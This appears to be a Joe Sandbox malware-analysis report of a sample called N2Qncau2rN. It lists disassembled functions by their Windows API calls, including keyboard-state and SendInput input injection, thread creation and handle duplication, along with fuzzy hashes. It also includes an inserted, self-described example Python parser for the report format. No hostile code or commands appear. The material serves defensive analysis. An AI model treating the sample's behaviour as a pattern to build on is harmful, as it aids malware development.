Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID: [B
• API String ID: 1020059152-632041663
• Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
• Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
• Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
• Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413DA4
• __calloc_crt.LIBCMT ref: 00413DB0
• __getptd.LIBCMT ref: 00413DBD
• CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
• _free.LIBCMT ref: 00413E07
• __dosmaperr.LIBCMT ref: 00413E12
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
• Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
• Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
• Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
• Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 259663610-0
                                                                                                                                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3220332590-0
                                                                                                                                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1612042205-0
                                                                                                                                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove_strncmp
                                                                                                                                                                                                                • String ID: >$U$\
                                                                                                                                                                                                                • API String ID: 2666721431-237099441
                                                                                                                                                                                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8

APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9

APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(?,?), ref: 00451C0E
• VariantCopy.OLEAUT32(?,?), ref: 00451C27
• VariantClear.OLEAUT32(?), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8

APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69

APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
• Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
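Every function entry in this part of the report has the same line-oriented layout: an "APIs" list of call-site lines (`Name.MODULE(args), ref: address`), a "Memory Dump Source" block naming the dump the function was lifted from, and a "Similarity" block carrying the API ID and the opcode / instruction fuzzy hashes. When you want to pivot on this data (which functions touch a given API, which modules a sample leans on, where the call sites cluster) it helps to have it as records rather than page text. The parser below is an added example written for this page; it is not Joe Sandbox's own code or output format definition. The sample text embedded in it is copied from two of the entries above (the VariantCopy and BeginPaint functions, with most of the "Associated" dump lines trimmed) and is labelled as constructed. The helper names (`parse_entries`, `api_sequence`, `functions_calling`, `module_usage`, `call_site_range`) are this example's own, and the regexes assume the layout exactly as the entries above render it.

```python
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: two function entries copied from the report text for
# N2Qncau2rN.exe above, in the same bullet layout the report uses. The
# "Associated" dump list has been shortened for brevity.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(?,?), ref: 00451C0E
• VariantCopy.OLEAUT32(?,?), ref: 00451C27
• VariantClear.OLEAUT32(?), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
"""

# Section headers as they appear in each entry; "APIs" opens a new entry.
SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = "\u2022"
# One call-site line: Name.MODULE(arg,arg,...), ref: HEXADDR
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Any other bullet line is "Key: value" (value may be empty, e.g. "String ID:").
KV_RE = re.compile(r"^(?P<key>[^:]+):\s?(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple      # raw argument tokens; "?" means the sandbox could not resolve the value
    ref: int         # address of the call site inside the dumped image (not the function start)


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)   # "Source File", "API ID", fuzzy hashes, ...


def _clean(line):
    """Strip the indentation and the trailing 'Download File' link label the page renders."""
    line = line.strip()
    if line.endswith("Download File"):
        line = line[: -len("Download File")].rstrip()
    return line


def parse_entries(text):
    """Split report text into FunctionEntry records, one per 'APIs' block."""
    entries, entry, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                entry = FunctionEntry()
                entries.append(entry)
            continue
        if entry is None:               # page fragment that starts mid-entry
            entry = FunctionEntry()
            entries.append(entry)
        if line.startswith(BULLET):
            line = line[len(BULLET):].strip()
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = tuple(a for a in m["args"].split(",") if a != "")
            entry.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m["key"].strip(), m["value"].strip()
            if key == "Associated":      # repeated key: keep every dump, not just the last
                entry.meta.setdefault(key, []).append(value)
            else:
                entry.meta[key] = value
    return entries


def api_sequence(entry):
    """Ordered API names of one function, as listed by the report."""
    return [c.name for c in entry.apis]


def functions_calling(entries, api_name):
    """Entries whose call list contains api_name (pivot: 'who calls SendMessageW?')."""
    return [e for e in entries if any(c.name == api_name for c in e.apis)]


def module_usage(entries):
    """Count of call sites per imported module across all parsed functions."""
    return Counter(c.module for e in entries for c in e.apis)


def call_site_range(entry):
    """Lowest and highest call-site address of a function, or None if it lists no calls."""
    refs = [c.ref for c in entry.apis]
    return (min(refs), max(refs)) if refs else None


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        lo, hi = call_site_range(e)
        print(f"{lo:08X}-{hi:08X}  {e.meta.get('API ID')}  {' -> '.join(api_sequence(e))}")
```

The `_clean` step is what lets the same parser run over the raw page text, where each bullet is heavily indented and every "Associated" dump line ends in the "Download File" link label. Note that `ref` values are call-site addresses, so `call_site_range` brackets the calls, not the function boundaries; to get the function itself you still need the dump named in "Source File" and the snapshot referenced under "Joe Sandbox IDA Plugin".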
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
